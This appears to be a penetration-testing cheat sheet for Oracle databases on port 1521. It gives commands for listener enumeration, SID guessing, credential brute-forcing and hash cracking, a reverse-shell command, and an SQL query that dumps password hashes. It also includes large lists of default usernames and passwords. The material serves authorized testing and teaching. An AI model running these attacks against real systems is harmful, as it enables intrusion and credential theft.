Resources
- Mindmap
- Key Articles & Presentations
- By xakep (RU): https://xakep.ru/2015/04/07/195-oracle-db/#toc05
- By Black Hat (Gates): https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
- By Pentesting Site: https://pentesting.site/exploitation-of-ports-and-services/port-1521-oracle-database/
- By HackTricks: https://book.hacktricks.wiki/en/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener
- By Secybr: https://secybr.com/posts/oracle-pentesting-best-practices/
- TNS Poisoning
- Video Demo: https://youtu.be/0IKltOBXiII
- Whitepaper (Integrigy): https://www.integrigy.com/files/Integrigy%20Oracle%20TNS%20Poisoning%20Attacks.pdf
- SQL Injection
- PentestMonkey Cheat Sheet: https://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
- Default Credentials
- Pete Finnigan’s List: https://www.petefinnigan.com/default/oracle_default_passwords.htm
- CIRT.net List: https://cirt.net/passwords?vendor=Oracle
- Error Codes
- Official TNS Error Documentation: https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7
Tools
- ODAT (Oracle Database Attacking Tool): https://github.com/quentinhardy/odat/
- SQLPlus Client: Oracle’s command-line tool for executing SQL and PL/SQL.
How to install
sqlpluson Debian/UbuntuYou may need to install the Oracle Instant Client first. See this guide for resolving library issues: Stack Overflow
# Quick fix for shared library error sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf" sudo ldconfig
Commands
-
Version Discovery:
# Metasploit msf auxiliary(scanner/oracle/tnslsnr_version) # tnscmd10g (Note the VSNNUM for version identification) tnscmd10g version -p 1521 -h 10.129.205.19 -
SID & Service Name Enumeration:
# ODAT SID Guesser odat sidguesser -s 10.129.205.19 -p 1521 # ODAT Service Name Guesser odat snguesser -s 10.129.205.19 -p 1521 # Metasploit SID Brute msf auxiliary(scanner/oracle/sid_brute) # Get Service Name from Listener Status tnscmd10g status -h 10.129.205.19 -p 1521 -
Bruteforce Users & Passwords:
oracle-brute-stealthscript is effective against older, vulnerable versions (11.1.x, 11.2.x).The
# Nmap Stealth Brute nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=XE -n 10.129.205.19 # Metasploit Login Scanner msf auxiliary(admin/oracle/oracle_login) # ODAT Password Guesser odat passwordguesser -s 10.129.40.54 -p 1521 -d XE # Crack captured hashes with John the Ripper john hashes.txt -
Check for Privileges with ODAT:
# Get current privileges odat privesc -s 10.129.112.195 -U scott -P tiger -d XE --get-privs # Test for SYSDBA role odat privesc -s 10.129.112.195 -U scott -P tiger -d XE --sysdba --test-module # Test for SYSOPER role odat privesc -s 10.129.112.195 -U scott -P tiger -d XE --sysoper --test-module -
Remote Code Execution & Reverse Shells:
# ODAT reverse shell via DBMS_SCHEDULER odat dbmsscheduler -s 10.129.112.195 -U scott -P tiger -d XE --sysdba --reverse-shell 10.10.14.104 7777 -
Interactive SQL Session:
# Connect with sqlplus sqlplus scott/tiger@10.129.40.54:1521/XE # Attempt to connect as SYSDBA sqlplus scott/tiger@10.129.40.54:1521/XE 'as sysdba' -
Useful SQL Statements:
-- Get database version SELECT version FROM v$instance; SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; -- Enumerate users SELECT username FROM all_users ORDER BY username; -- Dump password hashes from user table SELECT name, password, spare4 FROM sys.user$ WHERE password IS NOT NULL OR spare4 IS NOT NULL; -- Get database name SELECT global_name FROM global_name; -- Find column names for a specific table SELECT column_name FROM all_tab_columns WHERE table_name = 'XE'; -
All-in-One Scan with ODAT:
odat all -s 10.129.40.54 -p 1521
Notes
NOTE
The TNS Poisoning Attack
By default, the Oracle TNS listener doesn’t authenticate redirection instructions. This allows an attacker to inject themselves as a fake database node, intercepting traffic. The primary configuration files are
tnsnames.oraandlistener.ora, typically located in$ORACLE_HOME/network/admin.
NOTE
Account Lockout Policy
The
FAILED_LOGIN_ATTEMPTSparameter specifies the number of failed logins before an account is locked (default is usually 10). Be mindful of this during bruteforce attacks.
NOTE
Social Engineering in Bruteforcing
When bruteforcing, don’t forget about passwords related to the company name, system name, hostnames, and other social aspects.
Default Users
Username AASH ABA1 abm ABM adams ADAMS adldemo ADLDEMO admin ADMIN administrator ADMINISTRATOR AD_MONITOR ADS ADSEUL_US ahl AHL ahm AHM ak AK AL ALA1 alhro ALHRO alhrw ALHRW ALLUSERS alr ALR AMA1 AMA2 AMA3 AMA4 AMF ams AMS AMS1 AMS2 AMS3 AMS4 AMSYS amv AMV AMW andy ANDY ANNE anonymous ANONYMOUS AOLDEMO ap AP APA1 APA2 APA3 APA4 APPLEAD applmgr APPLMGR applsys APPLSYS applsyspub APPLSYSPUB applysyspub APPLYSYSPUB apps APPS apps_mrc APPS_MRC appuser APPUSER APS1 APS2 APS3 APS4 aq AQ aqdemo AQDEMO aqjava AQJAVA aquser AQUSER ar AR ARA1 ARA2 ARA3 ARA4 ARS1 ARS2 ARS3 ARS4 ART asf ASF asg ASG asl ASL ASN aso ASO asp ASP ast AST atm ATM AUC_GUEST audiouser AUDIOUSER aurorautility$ AURORAUTILITY$ auroraunauthenticated AURORAUNAUTHENTICATED AUTHORIA ax AX az AZ B2B BAM bc4j BC4J BCA1 BCA2 ben BEN bic BIC bil BIL bim BIM bis BIS biv BIV bix BIX blake BLAKE blewis BLEWIS BMEADOWS BNE bom BOM BP01 BP02 BP03 BP04 BP05 BP06 brio_admin BRIO_ADMIN brugernavn BRUGERNAVN brukernavn BRUKERNAVN bsc BSC bug_reports BUG_REPORTS BUYACCT BUYAPPR1 BUYAPPR2 BUYAPPR3 BUYER BUYMTCH calvin CALVIN CAMRON CANDICE CARL CARLY CARMEN CARRIECONYERS CATADMIN catalog CATALOG cct CCT cdemo82 CDEMO82 cdemocor CDEMOCOR cdemorid CDEMORID cdemoucb CDEMOUCB cdouglas CDOUGLAS ce CE CEASAR centra CENTRA central CENTRAL CFD CHANDRA CHARLEY CHRISBAKER CHRISTIE cids CIDS CINDY cis CIS cisinfo CISINFO clark CLARK CLAUDE CLINT CLN cn CN CNCADMIN company COMPANY compiere COMPIERE CONNIE CONNOR CORY cqschemauser CQSCHEMAUSER cquserdbuser CQUSERDBUSER CRM1 CRM2 crp CRP CRPB733 CRPCTL CRPDTA cs CS CSADMIN CSAPPR1 csc CSC csd CSD CSDUMMY cse CSE csf CSF csi CSI csl CSL CSM csmig CSMIG csp CSP csr CSR css CSS ctxdemo CTXDEMO ctxsys CTXSYS CTXTEST cua CUA cue CUE cuf CUF cug CUG cui CUI cun CUN cup CUP cus CUS cz CZ data_schema DATA_SCHEMA DAVIDMORGAN dbi DBI dbsnmp DBSNMP dbvision DBVISION DCM DD7333 DD7334 DD810 DD811 DD812 DD9 DDB733 DDD ddic DDIC demo DEMO demo8 DEMO8 demo9 DEMO9 des DES des2k DES2K dev2000_demos DEV2000_DEMOS DEVB733 DEVUSER DGRAY diane DIANE dip DIP DISCOVERER5 discoverer_admin DISCOVERER_ADMIN DKING DLD DMADMIN DMATS DMS dmsys DMSYS DOM dpf DPF DPOND dsgateway DSGATEWAY dssys DSSYS dtsp DTSP DV7333 DV7334 DV810 DV811 DV812 DV9 DVP1 eaa EAA eam EAM earlywatch EARLYWATCH east EAST ec EC ecx ECX EDR EDWEUL_US EDWREP EGC1 EGD1 EGM1 EGO EGR1 ejb EJB ejsadmin EJSADMIN emp EMP END1 eng ENG eni ENI ENM1 ENS1 ENTMGR_CUST ENTMGR_PRO ENTMGR_TRAIN EOPP_PORTALADM EOPP_PORTALMGR EOPP_USER estoreuser ESTOREUSER EUL_US event EVENT evm EVM EXA1 EXA2 EXA3 EXA4 example EXAMPLE exfsys EXFSYS EXS1 EXS2 EXS3 EXS4 extdemo EXTDEMO extdemo2 EXTDEMO2 fa FA fem FEM FIA1 fii FII finance FINANCE finprod FINPROD flm FLM fnd FND FNI1 FNI2 foo FOO FPA fpt FPT frm FRM frosty FROSTY FTA1 fte FTE FUN fv FV FVP1 GALLEN GCA1 GCA2 GCA3 GCA9 GCMGR1 GCMGR2 GCMGR3 GCS GCS1 GCS2 GCS3 GEORGIAWINE gl GL GLA1 GLA2 GLA3 GLA4 GLS1 GLS2 GLS3 GLS4 gma GMA GM_AWDA GM_COPI gmd GMD GM_DPHD gme GME gmf GMF gmi GMI gml GML GM_MLCT gmp GMP GM_PLADMA GM_PLADMH GM_PLCCA GM_PLCCH GM_PLCOMA GM_PLCOMH GM_PLCONA GM_PLCONH GM_PLNSCA GM_PLNSCH GM_PLSCTA GM_PLSCTH GM_PLVET gms GMS GM_SPO GM_STKH gpfd GPFD gpld GPLD gr GR GUEST hades HADES HCC hcpark HCPARK HHCFO hlw HLW hr HR hri HRI hvst HVST hxc HXC hxt HXT IA iba IBA IBC ibe IBE ibp IBP ibu IBU iby IBY icdbown ICDBOWN icx ICX idemo_user IDEMO_USER ieb IEB iec IEC iem IEM ieo IEO ies IES ieu IEU iex IEX ifssys IFSSYS igc IGC igf IGF igi IGI igs IGS igw IGW imageuser IMAGEUSER imc IMC imedia IMEDIA imt IMT INS1 INS2 internal internal INTERNAL INTERNAL inv INV IP ipa IPA ipd IPD iplanet IPLANET isc ISC ISTEWARD itg ITG ja JA jake JAKE JD7333 JD7334 JD9 JDE JDEDBA je JE jg JG jill JILL jl JL JL jmuser JMUSER john JOHN JOHNINARI jones JONES jtf JTF JTI jtm JTM JTR jts JTS JUNK_PS JUSTOSHUM jward JWARD KELLYJONES KEVINDONS KPN kwalker KWALKER l2ldemo L2LDEMO LADAMS LBA lbacsys LBACSYS LDQUAL LHILL librarian LIBRARIAN LNS LQUINCY LSA manprod MANPROD mark MARK mascarm MASCARM master MASTER mddata MDDATA mddemo MDDEMO mddemo_clerk MDDEMO_CLERK mddemo_mgr MDDEMO_MGR mdsys MDSYS me ME mfg MFG mgr MGR MGR1 MGR2 MGR3 MGR4 mgwuser MGWUSER migrate MIGRATE MIKEIKEGAMI miller MILLER MJONES MLAKE MM1 MM2 MM3 MM4 MM5 MMARTIN mmo2 MMO2 MOBILEADMIN modtest MODTEST moreau MOREAU mrp MRP msc MSC msd MSD mso MSO msr MSR MST mtssys MTSSYS mts_user MTS_USER mwa MWA mxagent MXAGENT names NAMES NEILKATSU neotix_sys NEOTIX_SYS nneul NNEUL nomeutente NOMEUTENTE nome_utilizador NOME_UTILIZADOR nom_utilisateur NOM_UTILISATEUR nume_utilizator NUME_UTILIZATOR oas_public OAS_PUBLIC OBJ7333 OBJ7334 OBJB733 OCA ocitest OCITEST ocm_db_admin OCM_DB_ADMIN odm ODM odm_mtr ODM_MTR ods ODS odscommon ODSCOMMON ods_server ODS_SERVER oe OE oemadm OEMADM oemrep OEMREP okb OKB okc OKC oke OKE oki OKI OKL oko OKO okr OKR oks OKS okx OKX OL810 OL811 OL812 OL9 olapdba OLAPDBA olapsvr OLAPSVR olapsys OLAPSYS omwb_emulation OMWB_EMULATION ont ONT oo OO openspirit OPENSPIRIT opi OPI ORABAM ORABAMSAMPLES ORABPEL oracache ORACACHE oracle ORACLE oradba ORADBA ORAESB ORAOCA_PUBLIC oraprobe ORAPROBE oraregsys ORAREGSYS ORASAGENT orasso ORASSO orasso_ds ORASSO_DS orasso_pa ORASSO_PA orasso_ps ORASSO_PS orasso_public ORASSO_PUBLIC orastat ORASTAT orcladmin ORCLADMIN ordcommon ORDCOMMON ordplugins ORDPLUGINS ordsys ORDSYS oseadmin OSEADMIN osm OSM osp22 OSP22 ota OTA outln OUTLN owa OWA OWAPUB owa_public OWA_PUBLIC owf_mgr OWF_MGR owner OWNER ozf OZF ozp OZP ozs OZS pa PA PABLO PAIGE PAM panama PANAMA PARRISH PARSON PAT PATORILY PATRICKSANCHEZ patrol PATROL PATSY paul PAUL PAULA PAXTON PCA1 PCA2 PCA3 PCA4 PCS1 PCS2 PCS3 PCS4 PD7333 PD7334 PD810 PD811 PD812 PD9 PDA1 PEARL PEG PENNY PEOPLE PERCY perfstat PERFSTAT PERRY perstat PERSTAT PETE PEYTON PHIL PJI pjm PJM planning PLANNING plex PLEX plsql PLSQL pm PM pmi PMI pn PN po PO po7 PO7 po8 PO8 poa POA POLLY pom POM PON PORTAL portal30 PORTAL30 portal30_admin PORTAL30_ADMIN portal30_demo PORTAL30_DEMO portal30_ps PORTAL30_PS portal30_public PORTAL30_PUBLIC portal30_sso PORTAL30_SSO portal30_sso_admin PORTAL30_SSO_ADMIN portal30_sso_ps PORTAL30_SSO_PS portal30_sso_public PORTAL30_SSO_PUBLIC PORTAL_APP portal_demo PORTAL_DEMO PORTAL_PUBLIC portal_sso_ps PORTAL_SSO_PS pos POS powercartuser POWERCARTUSER PPM1 PPM2 PPM3 PPM4 PPM5 primary PRIMARY PRISTB733 PRISTCTL PRISTDTA PRODB733 PRODCTL PRODDTA PRODUSER PROJMFG PRP PS PS810 PS810CTL PS810DTA PS811 PS811CTL PS811DTA PS812 PS812CTL PS812DTA psa PSA psb PSB PSBASS PSEM PSFT PSFTDBA psp PSP PTADMIN PTCNE PTDMO PTE PTESP PTFRA PTG PTGER PTJPN PTUKE PTUPG PTWEB PTWEBSERVER pubsub PUBSUB pubsub1 PUBSUB1 pv PV PY7333 PY7334 PY810 PY811 PY812 PY9 qa QA qdba QDBA QOT qp QP QRM qs QS qs_adm QS_ADM qs_cb QS_CB qs_cbadm QS_CBADM qs_cs QS_CS qs_es QS_ES qs_os QS_OS qs_ws QS_WS re RE RENE repadmin REPADMIN rep_manager REP_MANAGER reports REPORTS reports_user REPORTS_USER rep_owner REP_OWNER rep_user REP_USER RESTRICTED_US rg RG rhx RHX rla RLA rlm RLM RM1 RM2 RM3 RM4 RM5 rmail RMAIL rman RMAN ROB RPARKER rrs RRS RWA1 SALLYH SAM sample SAMPLE sap SAP sapr3 SAPR3 SARAHMANDY SCM1 SCM2 SCM3 SCM4 scott SCOTT SDAVIS sdos_icsap SDOS_ICSAP secdemo SECDEMO SEDWARDS SELLCM SELLER SELLTREAS serviceconsumer1 SERVICECONSUMER1 SERVICES SETUP sh SH SID si_informtn_schema SI_INFORMTN_SCHEMA siteminder SITEMINDER SKAYE SKYTETSUKA slide SLIDE SLSAA SLSMGR SLSREP spierson SPIERSON SRABBITT SRALPHS SRAY SRIVERS SSA1 SSA2 SSA3 SSC1 SSC2 SSC3 SSOSDK ssp SSP SSS1 starter STARTER strat_user STRAT_USER SUPPLIER SVM7333 SVM7334 SVM810 SVM811 SVM812 SVM9 SVMB733 SVP1 swpro SWPRO swuser SWUSER SY810 SY811 SY812 SY9 sympa SYMPA sys SYS SYS7333 SYS7334 sysadm SYSADM sysadmin SYSADMIN SYSB733 sysman SYSMAN system SYSTEM tahiti TAHITI talbot TALBOT TDEMARCO tdos_icsap TDOS_ICSAP tec TEC test TEST TESTCTL TESTDTA testpilot TESTPILOT test_user TEST_USER thinsample THINSAMPLE tibco TIBCO tip37 TIP37 TRA1 tracesvr TRACESVR travel TRAVEL TRBM1 TRCM1 TRDM1 TRRM1 tsdev TSDEV tsuser TSUSER turbine TURBINE TWILLIAMS UDDISYS ultimate ULTIMATE um_admin UM_ADMIN um_client UM_CLIENT user USER user0 USER0 user1 USER1 user2 USER2 user3 USER3 user4 USER4 user5 USER5 user6 USER6 user7 USER7 user8 USER8 user9 USER9 user_name USER_NAME usuario USUARIO utility UTILITY utlbstatu UTLBSTATU vea VEA veh VEH vertex_login VERTEX_LOGIN VIDEO31 VIDEO4 VIDEO5 videouser VIDEOUSER vif_developer VIF_DEVELOPER viruser VIRUSER VP1 VP2 VP3 VP4 VP5 VP6 vpd_admin VPD_ADMIN vrr1 VRR1 WAA1 WAA2 WCRSYS webcal01 WEBCAL01 webdb WEBDB webread WEBREAD websys WEBSYS webuser WEBUSER WENDYCHO west WEST wfadmin WFADMIN wh WH wip WIP WIRELESS wkadmin WKADMIN wkproxy WKPROXY wksys WKSYS wk_test WK_TEST wkuser WKUSER wms WMS wmsys WMSYS wob WOB wps WPS wsh WSH wsm WSM www WWW wwwuser WWWUSER xademo XADEMO xdb XDB XDO xdp XDP xla XLA XLE XNB xnc XNC xni XNI xnm XNM xnp XNP xns XNS xprt XPRT xtr XTR YCAMPOS YSANCHEZ ZFA ZPB ZSA ZX
Default Passwords
Password 06071992 0racl3 0RACL3 0racl38 0RACL38 0racl38i 0RACL38I 0racl39 0RACL39 0racl39i 0RACL39I 0racle 0RACLE 0racle8 0RACLE8 0racle8i 0RACLE8I 0racle9 0RACLE9 0racle9i 0RACLE9I 199220706 AASH ABA1 abm ABM adgangskode ADGANGSKODE adldemo ADLDEMO admin ADMIN administrator ADMINISTRATOR ADS ahl AHL ahm AHM airoplane AIROPLANE ak AK akf7d98s2 AKF7D98S2 AL ALA1 ALLUSERS alr ALR AMA1 AMA2 AMA3 AMA4 AMF ams AMS AMS1 AMS2 AMS3 AMS4 AMSYS amv AMV AMW ANNE anonymous ANONYMOUS AOLDEMO ap AP APA1 APA2 APA3 APA4 APPLEAD applmgr APPLMGR applsys APPLSYS applsyspub APPLSYSPUB apppassword APPPASSWORD apps APPS APS1 APS2 APS3 APS4 aq AQ aqdemo AQDEMO aqjava AQJAVA aquser AQUSER ar AR ARA1 ARA2 ARA3 ARA4 ARS1 ARS2 ARS3 ARS4 ART asf ASF asg ASG asl ASL ASN aso ASO asp ASP ast AST AUC_GUEST audiouser AUDIOUSER AUTHORIA ax AX az AZ B2B BAM bar BAR bc4j BC4J BCA1 BCA2 ben BEN bic BIC bil BIL bim BIM bis BIS biv BIV bix BIX blewis BLEWIS BMEADOWS BNE bom BOM BP01 BP02 BP03 BP04 BP05 BP06 brio_admin BRIO_ADMIN bsc BSC bug_reports BUG_REPORTS BUYACCT BUYAPPR1 BUYAPPR2 BUYAPPR3 BUYER BUYMTCH CAMRON CANDICE CARL CARLY CARMEN CARRIECONYERS CATADMIN catalog CATALOG cct CCT cdemo82 CDEMO82 cdemo83 CDEMO83 cdemocor CDEMOCOR cdemorid CDEMORID cdemoucb CDEMOUCB cdouglas CDOUGLAS ce CE CEASAR centra CENTRA central CENTRAL CFD CHANDRA change_on_install CHANGE_ON_INSTALL CHARLEY CHRISBAKER CHRISTIE cids CIDS CINDY cis CIS cisinfo CISINFO CLARK CLAUDE clave CLAVE clerk CLERK CLINT CLN cloth CLOTH cn CN CNCADMIN company COMPANY compiere COMPIERE CONNIE CONNOR CORY CRM1 CRM2 crp CRP CRPB733 CRPCTL CRPDTA cs CS CSADMIN CSAPPR1 csc CSC csd CSD CSDUMMY cse CSE csf CSF csi CSI csl CSL CSM csmig CSMIG csp CSP csr CSR css CSS ctxdemo CTXDEMO ctxsys CTXSYS CTXTEST cua CUA cue CUE cuf CUF cug CUG cui CUI cun CUN cup CUP cus CUS cz CZ DAVIDMORGAN dbsnmp DBSNMP dbvision DBVISION DCM DD7333 DD7334 DD810 DD811 DD812 DD9 DDB733 DDD demo DEMO demo8 DEMO8 demo9 DEMO9 des DES des2k DES2K dev2000_demos DEV2000_DEMOS DEVB733 DEVUSER dip DIP DISCOVERER5 discoverer_admin DISCOVERER_ADMIN DKING DLD DMATS DMS dmsys DMSYS DOM dpfpass DPFPASS DPOND dsgateway DSGATEWAY dssys DSSYS d_syspw D_SYSPW d_systpw D_SYSTPW dtsp DTSP DV7333 DV7334 DV810 DV811 DV812 DV9 DVP1 eaa EAA eam EAM east EAST ec EC ecx ECX EDR EDWEUL_US EDWREP EGC1 EGD1 EGM1 EGO EGR1 ejb EJB ejsadmin EJSADMIN ejsadmin_password EJSADMIN_PASSWORD emp EMP END1 eng ENG eni ENI ENM1 ENS1 ENTMGR_CUST ENTMGR_PRO ENTMGR_TRAIN EOPP_PORTALADM EOPP_PORTALMGR EOPP_USER estore ESTORE EUL_US event EVENT evm EVM EXA1 EXA2 EXA3 EXA4 example EXAMPLE exfsys EXFSYS EXS1 EXS2 EXS3 EXS4 extdemo EXTDEMO extdemo2 EXTDEMO2 fa FA fem FEM FIA1 fii FII finance FINANCE finprod FINPROD flm FLM fnd FND fndpub FNDPUB FNI1 FNI2 FPA fpt FPT frm FRM FTA1 fte FTE FUN fv FV FVP1 GALLEN GCA1 GCA2 GCA3 GCA9 GCMGR1 GCMGR2 GCMGR3 GCS GCS1 GCS2 GCS3 GEORGIAWINE gl GL GLA1 GLA2 GLA3 GLA4 GLS1 GLS2 GLS3 GLS4 gma GMA GM_AWDA GM_COPI gmd GMD GM_DPHD gme GME gmf GMF gmi GMI gml GML GM_MLCT gmp GMP GM_PLADMA GM_PLADMH GM_PLCCA GM_PLCCH GM_PLCOMA GM_PLCOMH GM_PLCONA GM_PLCONH GM_PLNSCA GM_PLNSCH GM_PLSCTA GM_PLSCTH GM_PLVET gms GMS GM_SPO GM_STKH gpfd GPFD gpld GPLD gr GR GUEST hades HADES HCC hcpark HCPARK HHCFO hlw HLW hobbes HOBBES hr HR hri HRI hvst HVST hxc HXC hxt HXT IA iba IBA IBC ibe IBE ibp IBP ibu IBU iby IBY icdbown ICDBOWN icx ICX idemo_user IDEMO_USER ieb IEB iec IEC iem IEM ieo IEO ies IES ieu IEU iex IEX ifssys IFSSYS igc IGC igf IGF igi IGI igs IGS igw IGW imageuser IMAGEUSER imc IMC imedia IMEDIA imt IMT INS1 INS2 instance INSTANCE inv INV invalid INVALID Invalid password IP ipa IPA ipd IPD iplanet IPLANET isc ISC ISTEWARD itg ITG ja JA JD7333 JD7334 JD9 JDE JDEDBA je JE jetspeed JETSPEED jg JG jl JL JL jmuser JMUSER john JOHN JOHNINARI jtf JTF JTI jtm JTM JTR jts JTS JUNK_PS JUSTOSHUM KELLYJONES KEVINDONS KPN kwalker KWALKER l2ldemo L2LDEMO LADAMS laskjdf098ksdaf09 LASKJDF098KSDAF09 LBA lbacsys LBACSYS LDQUAL LHILL LIZARD LNS LQUINCY LSA manag3r MANAG3R manager MANAGER manprod MANPROD mddata MDDATA mddemo MDDEMO mddemo_mgr MDDEMO_MGR mdsys MDSYS me ME mfg MFG mgr MGR MGR1 MGR2 MGR3 MGR4 mgwuser MGWUSER migrate MIGRATE MIKEIKEGAMI miller MILLER MJONES MLAKE MM1 MM2 MM3 MM4 MM5 MMARTIN mmo2 MMO2 mmo3 MMO3 moreau MOREAU mot_de_passe MOT_DE_PASSE mrp MRP msc MSC msd MSD mso MSO msr MSR MST mt6ch5 MT6CH5 mtrpw MTRPW mts_password MTS_PASSWORD mtssys MTSSYS mumblefratz MUMBLEFRATZ mwa MWA mxagent MXAGENT names NAMES NEILKATSU neotix_sys NEOTIX_SYS nneulpass NNEULPASS oas_public OAS_PUBLIC OBJ7333 OBJ7334 OBJB733 OCA ocitest OCITEST ocm_db_admin OCM_DB_ADMIN odm ODM ods ODS odscommon ODSCOMMON ods_server ODS_SERVER oe OE oemadm OEMADM oemrep OEMREP oem_temp OEM_TEMP okb OKB okc OKC oke OKE oki OKI OKL oko OKO okr OKR oks OKS okx OKX OL810 OL811 OL812 OL9 olapdba OLAPDBA olapsvr OLAPSVR olapsys OLAPSYS ont ONT oo OO openspirit OPENSPIRIT opi OPI ORABAM ORABAMSAMPLES ORABPEL oracache ORACACHE oracl3 ORACL3 oracle ORACLE oracle8 ORACLE8 oracle8i ORACLE8I oracle9 ORACLE9 oracle9i ORACLE9I oradbapass ORADBAPASS ORAESB ORAOCA_PUBLIC oraprobe ORAPROBE oraregsys ORAREGSYS ORASAGENT orasso ORASSO orasso_ds ORASSO_DS orasso_pa ORASSO_PA orasso_ps ORASSO_PS orasso_public ORASSO_PUBLIC orastat ORASTAT ordcommon ORDCOMMON ordplugins ORDPLUGINS ordsys ORDSYS osm OSM osp22 OSP22 ota OTA outln OUTLN owa OWA OWAPUB owa_public OWA_PUBLIC owf_mgr OWF_MGR owner OWNER ozf OZF ozp OZP ozs OZS pa PA PABLO PAIGE PAM panama PANAMA paper PAPER parol PAROL PARRISH PARSON passwd PASSWD passwo1 PASSWO1 passwo2 PASSWO2 passwo3 PASSWO3 passwo4 PASSWO4 password PASSWORD PAT PATORILY PATRICKSANCHEZ patrol PATROL PATSY paul PAUL PAULA PAXTON PCA1 PCA2 PCA3 PCA4 PCS1 PCS2 PCS3 PCS4 PD7333 PD7334 PD810 PD811 PD812 PD9 PDA1 PEARL PEG PENNY PEOP1E PERCY perfstat PERFSTAT PERRY perstat PERSTAT PETE PEYTON PHIL PJI pjm PJM planning PLANNING plex PLEX pm PM pmi PMI pn PN po PO po7 PO7 po8 PO8 poa POA POLLY pom POM PON PORTAL portal30 PORTAL30 portal30_admin PORTAL30_ADMIN portal30_demo PORTAL30_DEMO portal30_ps PORTAL30_PS portal30_public PORTAL30_PUBLIC portal30_sso PORTAL30_SSO portal30_sso_admin PORTAL30_SSO_ADMIN portal30_sso_ps PORTAL30_SSO_PS portal30_sso_public PORTAL30_SSO_PUBLIC portal31 PORTAL31 PORTAL_APP portal_demo PORTAL_DEMO PORTAL_PUBLIC portal_sso_ps PORTAL_SSO_PS pos POS powercartuser POWERCARTUSER PPM1 PPM2 PPM3 PPM4 PPM5 primary PRIMARY PRISTB733 PRISTCTL PRISTDTA PRODB733 PRODCTL PRODDTA PRODUSER PRP PS PS810 PS810CTL PS810DTA PS811 PS811CTL PS811DTA PS812 PS812CTL PS812DTA psa PSA psb PSB PSBASS PSEM PSFT PSFTDBA psp PSP PTADMIN PTCNE PTDMO PTE PTESP PTFRA PTG PTGER PTJPN PTUKE PTUPG PTWEB PTWEBSERVER pub PUB pubsub PUBSUB pubsub1 PUBSUB1 pv PV PY7333 PY7334 PY810 PY811 PY812 PY9 qa QA qdba QDBA QOT qp QP QRM qs QS qs_adm QS_ADM qs_cb QS_CB qs_cbadm QS_CBADM qs_cs QS_CS qs_es QS_ES qs_os QS_OS qs_ws QS_WS re RE RENE repadmin REPADMIN reports REPORTS rep_owner REP_OWNER RESTRICTED_US rg RG rhx RHX rla RLA rlm RLM RM1 RM2 RM3 RM4 RM5 rmail RMAIL rman RMAN ROB RPARKER rrs RRS RWA1 SALLYH SAM sample SAMPLE sampleatm SAMPLEATM sap SAP sapr3 SAPR3 SARAHMANDY SCM1 SCM2 SCM3 SCM4 SDAVIS sdos_icsap SDOS_ICSAP secdemo SECDEMO SEDWARDS SELLCM SELLER SELLTREAS senha SENHA serviceconsumer1 SERVICECONSUMER1 SETUP sh SH shelves SHELVES SID si_informtn_schema SI_INFORMTN_SCHEMA siteminder SITEMINDER SKAYE SKYTETSUKA slidepw SLIDEPW SLSAA SLSMGR SLSREP snowman SNOWMAN spierson SPIERSON SRABBITT SRALPHS SRAY SRIVERS SSA1 SSA2 SSA3 SSC1 SSC2 SSC3 SSOSDK ssp SSP SSS1 starter STARTER steel STEEL strat_passwd STRAT_PASSWD supersecret SUPERSECRET SUPPLIER support SUPPORT SVM7333 SVM7334 SVM810 SVM811 SVM812 SVM9 SVMB733 SVP1 swordfish SWORDFISH swpro SWPRO swuser SWUSER SY810 SY811 SY812 SY9 sympa SYMPA sys SYS SYS7333 SYS7334 sysadm SYSADM sysadmin SYSADMIN SYSB733 sysman SYSMAN syspass SYSPASS sys_stnt SYS_STNT system SYSTEM systempass SYSTEMPASS tahiti TAHITI TDEMARCO tdos_icsap TDOS_ICSAP tectec TECTEC test TEST TESTCTL TESTDTA testpilot TESTPILOT test_user TEST_USER thinsamplepw THINSAMPLEPW tibco TIBCO tiger TIGER tigger TIGGER tip37 TIP37 TRA1 trace TRACE travel TRAVEL TRBM1 TRCM1 TRDM1 TRRM1 tsdev TSDEV tsuser TSUSER turbine TURBINE TWILLIAMS UDDISYS ultimate ULTIMATE um_admin UM_ADMIN um_client UM_CLIENT unknown UNKNOWN user USER user0 USER0 user1 USER1 user2 USER2 user3 USER3 user4 USER4 user5 USER5 user6 USER6 user7 USER7 user8 USER8 user9 USER9 utility UTILITY utlestat UTLESTAT vea VEA veh VEH vertex_login VERTEX_LOGIN VIDEO31 VIDEO4 VIDEO5 videouser VIDEOUSER vif_dev_pwd VIF_DEV_PWD viruser VIRUSER VP1 VP2 VP3 VP4 VP5 VP6 vrr1 VRR1 vrr2 VRR2 WAA1 WAA2 WCRSYS webcal01 WEBCAL01 webdb WEBDB webread WEBREAD welcome WELCOME WELCOME1 WENDYCHO west WEST wfadmin WFADMIN wh WH wip WIP WIRELESS wkadmin WKADMIN wkproxy WKPROXY wksys WKSYS wk_test WK_TEST wkuser WKUSER wms WMS wmsys WMSYS wob WOB wood WOOD wps WPS wsh WSH wsm WSM www WWW wwwuser WWWUSER xademo XADEMO XDO xdp XDP xla XLA XLE XNB xnc XNC xni XNI xnm XNM xnp XNP xns XNS xprt XPRT xtr XTR xxx XXX YCAMPOS yes YES your_pass YOUR_PASS YSANCHEZ ZFA ZPB ZSA zwerg ZWERG ZX